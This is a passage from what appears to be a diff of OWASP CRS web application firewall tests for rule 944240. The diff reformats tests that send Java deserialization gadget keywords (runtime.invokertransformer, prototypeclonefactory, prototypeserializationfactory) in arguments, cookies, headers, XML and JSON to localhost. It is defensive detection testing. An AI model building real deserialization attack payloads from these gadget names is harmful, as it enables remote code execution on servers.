"HTTP/1.0" + data: "{\"runtime.instantiatetransformer\": \"test\"}" + output: + log: + expect_ids: [944240] + - test_id: 45 desc: "Argument test includes keyword runtime.invokertransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=runtime.invokertransformer" - output: - log_contains: "id \"944240\"" - - test_title: 944240-46 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=runtime.invokertransformer" + output: + log: + expect_ids: [944240] + - test_id: 46 desc: "Argument name includes keyword runtime.invokertransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "runtime.invokertransformer=test" - output: - log_contains: "id \"944240\"" - - test_title: 944240-47 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "runtime.invokertransformer=test" + output: + log: + expect_ids: [944240] + - test_id: 47 desc: "Cookie test includes keyword runtime.invokertransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=runtime.invokertransformer - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944240\"" - - test_title: 944240-48 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=runtime.invokertransformer + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944240] + - test_id: 48 desc: "Cookie name includes keyword runtime.invokertransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: runtime.invokertransformer=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944240\"" - - test_title: 944240-49 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: runtime.invokertransformer=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944240] + - test_id: 49 desc: "Request header test includes keyword runtime.invokertransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: runtime.invokertransformer - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944240\"" - - test_title: 944240-50 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: runtime.invokertransformer + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944240] + - test_id: 50 desc: "XML attribute value includes keyword runtime.invokertransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944240\"" - - test_title: 944240-51 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944240] + - test_id: 51 desc: "XML element value includes keyword runtime.invokertransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "runtime.invokertransformer" - output: - log_contains: "id \"944240\"" - - test_title: 944240-52 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "runtime.invokertransformer" + output: + log: + expect_ids: [944240] + - test_id: 52 desc: "Nested XML element value includes keyword runtime.invokertransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "runtime.invokertransformer" - output: - log_contains: "id \"944240\"" - - test_title: 944240-53 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "runtime.invokertransformer" + output: + log: + expect_ids: [944240] + - test_id: 53 desc: "Content-Type text/plain includes keyword runtime.invokertransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=runtime.invokertransformer" - output: - log_contains: "id \"944240\"" - - test_title: 944240-54 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=runtime.invokertransformer" + output: + log: + expect_ids: [944240] + - test_id: 54 desc: "Content-Type application/json arg value includes keyword runtime.invokertransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"runtime.invokertransformer\"}" - output: - log_contains: "id \"944240\"" - - test_title: 944240-55 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"runtime.invokertransformer\"}" + output: + log: + expect_ids: [944240] + - test_id: 55 desc: "Content-Type application/json arg name includes keyword runtime.invokertransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"runtime.invokertransformer\": \"test\"}" - output: - log_contains: "id \"944240\"" - - test_title: 944240-56 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"runtime.invokertransformer\": \"test\"}" + output: + log: + expect_ids: [944240] + - test_id: 56 desc: "Argument test includes keyword runtime.prototypeclonefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=runtime.prototypeclonefactory" - output: - log_contains: "id \"944240\"" - - test_title: 944240-57 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=runtime.prototypeclonefactory" + output: + log: + expect_ids: [944240] + - test_id: 57 desc: "Argument name includes keyword runtime.prototypeclonefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "runtime.prototypeclonefactory=test" - output: - log_contains: "id \"944240\"" - - test_title: 944240-58 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "runtime.prototypeclonefactory=test" + output: + log: + expect_ids: [944240] + - test_id: 58 desc: "Cookie test includes keyword runtime.prototypeclonefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=runtime.prototypeclonefactory - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944240\"" - - test_title: 944240-59 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=runtime.prototypeclonefactory + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944240] + - test_id: 59 desc: "Cookie name includes keyword runtime.prototypeclonefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: runtime.prototypeclonefactory=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944240\"" - - test_title: 944240-60 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: runtime.prototypeclonefactory=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944240] + - test_id: 60 desc: "Request header test includes keyword runtime.prototypeclonefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: runtime.prototypeclonefactory - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944240\"" - - test_title: 944240-61 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: runtime.prototypeclonefactory + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944240] + - test_id: 61 desc: "XML attribute value includes keyword runtime.prototypeclonefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944240\"" - - test_title: 944240-62 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944240] + - test_id: 62 desc: "XML element value includes keyword runtime.prototypeclonefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "runtime.prototypeclonefactory" - output: - log_contains: "id \"944240\"" - - test_title: 944240-63 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "runtime.prototypeclonefactory" + output: + log: + expect_ids: [944240] + - test_id: 63 desc: "Nested XML element value includes keyword runtime.prototypeclonefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "runtime.prototypeclonefactory" - output: - log_contains: "id \"944240\"" - - test_title: 944240-64 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "runtime.prototypeclonefactory" + output: + log: + expect_ids: [944240] + - test_id: 64 desc: "Content-Type text/plain includes keyword runtime.prototypeclonefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=runtime.prototypeclonefactory" - output: - log_contains: "id \"944240\"" - - test_title: 944240-65 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=runtime.prototypeclonefactory" + output: + log: + expect_ids: [944240] + - test_id: 65 desc: "Content-Type application/json arg value includes keyword runtime.prototypeclonefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"runtime.prototypeclonefactory\"}" - output: - log_contains: "id \"944240\"" - - test_title: 944240-66 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"runtime.prototypeclonefactory\"}" + output: + log: + expect_ids: [944240] + - test_id: 66 desc: "Content-Type application/json arg name includes keyword runtime.prototypeclonefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"runtime.prototypeclonefactory\": \"test\"}" - output: - log_contains: "id \"944240\"" - - test_title: 944240-67 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"runtime.prototypeclonefactory\": \"test\"}" + output: + log: + expect_ids: [944240] + - test_id: 67 desc: "Argument test includes keyword runtime.prototypeserializationfactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=runtime.prototypeserializationfactory" - output: - log_contains: "id \"944240\"" - - test_title: 944240-68 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=runtime.prototypeserializationfactory" + output: + log: + expect_ids: [944240] + - test_id: 68 desc: "Argument name includes keyword runtime.prototypeserializationfactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "runtime.prototypeserializationfactory=test" - output: - log_contains: "id \"944240\"" - - test_title: 944240-69 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "runtime.prototypeserializationfactory=test" + output: + log: + expect_ids: [944240] + - test_id: 69 desc: "Cookie test includes keyword runtime.prototypeserializationfactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=runtime.prototypeserializationfactory - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944240\"" - - test_title: 944240-70 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=runtime.prototypeserializationfactory + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944240] + - test_id: 70 desc: "Cookie name includes keyword runtime.prototypeserializationfactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: runtime.prototypeserializationfactory=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944240\"" - - test_title: 944240-71 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: runtime.prototypeserializationfactory=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944240] + - test_id: 71 desc: "Request header test includes keyword runtime.prototypeserializationfactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: runtime.prototypeserializationfactory - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944240\"" - - test_title: 944240-72 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: runtime.prototypeserializationfactory + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944240] + - test_id: 72 desc: "XML attribute value includes keyword runtime.prototypeserializationfactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - 